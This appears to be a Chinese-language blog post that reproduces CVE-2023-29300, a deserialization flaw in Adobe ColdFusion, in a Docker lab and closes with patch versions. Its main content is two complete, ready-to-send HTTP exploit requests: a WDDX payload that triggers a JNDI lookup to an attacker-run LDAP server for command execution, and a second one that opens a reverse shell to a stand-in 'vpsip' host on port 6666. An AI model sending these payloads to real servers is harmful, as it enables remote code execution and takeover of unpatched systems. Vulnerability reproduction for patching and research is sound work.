Adobe ColdFusion 反序列化漏洞复现(CVE-2023-29300)

0x01 产品简介

Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。

0x02 漏洞概述

Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。

0x03 影响范围

ColdFusion 2018 <= Update 16

ColdFusion 2021 <= Update 6

ColdFusion 2023 GA Release (2023.0.0.330468)

0x04 复现环境

docker搭建ColdFusion 2023.0.0.330468漏洞环境

拉取镜像

复制代码
docker pull vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

启动环境

复制代码
docker run -d -P vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

PS:需确认8080对应的端口

验证是否可访问环境

0x05 漏洞复现

exp

复制代码
POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
cmd: id

argumentCollection=
<wddxPacket version='1.0'>
    <header/>
    <data>
        <struct type='xcom.sun.rowset.JdbcRowSetImplx'>
            <var name='dataSourceName'>
                <string>ldap://your-ip:1389/Basic/TomcatEcho</string>
            </var>
            <var name='autoCommit'>
                <boolean value='true'/>
            </var>
        </struct>
    </data>
</wddxPacket>

PS:本次复现需要使用jndi漏洞利用工具(JNDIExploit-1.4-SNAPSHOT.jar)

TomcatEcho回显链

开启监听

反弹shell

利用链:

复制代码
POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

argumentCollection=
<wddxPacket version='1.0'>
    <header/>
    <data>
        <struct type='xcom.sun.rowset.JdbcRowSetImplx'>
            <var name='dataSourceName'>
                <string>ldap://vpsip:1389/Basic/ReverseShell/vpsip/6666</string>
            </var>
            <var name='autoCommit'>
                <boolean value='true'/>
            </var>
        </struct>
    </data>
</wddxPacket>

0x06 修复建议

根据影响版本中的信息,建议相关用户尽快更新至安全版本:

ColdFusion 2018 Update 17

ColdFusion 2021 Update 7

ColdFusion 2023 Update 1

下载链接请参考:

https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html

相关推荐
匀泪1 小时前
网络安全(初级)(Python实现sql自动化布尔盲注)
安全·web安全·自动化
Ftrans11 小时前
【分享】文件摆渡系统适配医疗场景:安全与效率兼得
大数据·运维·安全
筑梦之月11 小时前
网络安全职业指南:探索网络安全领域的各种角色
安全·web安全
我认为可以!11 小时前
CSRF 攻击原理与实验测试(附可运行测试案例)
安全·csrf
Raners_11 小时前
【Java代码审计(2)】MyBatis XML 注入审计
xml·java·安全·网络安全·mybatis
Synfuture阳途12 小时前
终端安全管理系统为什么需要使用,企业需要的桌面管理软件
网络·安全
时间海里的溺水者13 小时前
应用软件格式渗透 利用word去渗透(MS10-087)
安全·web安全
枷锁—sha13 小时前
【DVWA系列】——File Upload——High详细教程(webshell工具哥斯拉)
网络·web安全·网络安全
HCIE考证研究所15 小时前
考完数通,能转云计算/安全方向吗?转型路径与拓展路线分析
网络·安全·华为·云计算·网络工程师·华为认证·数通
Xudde.18 小时前
解决了困扰我的upload靶场无法解析phtml等后缀的问题
学习·安全·php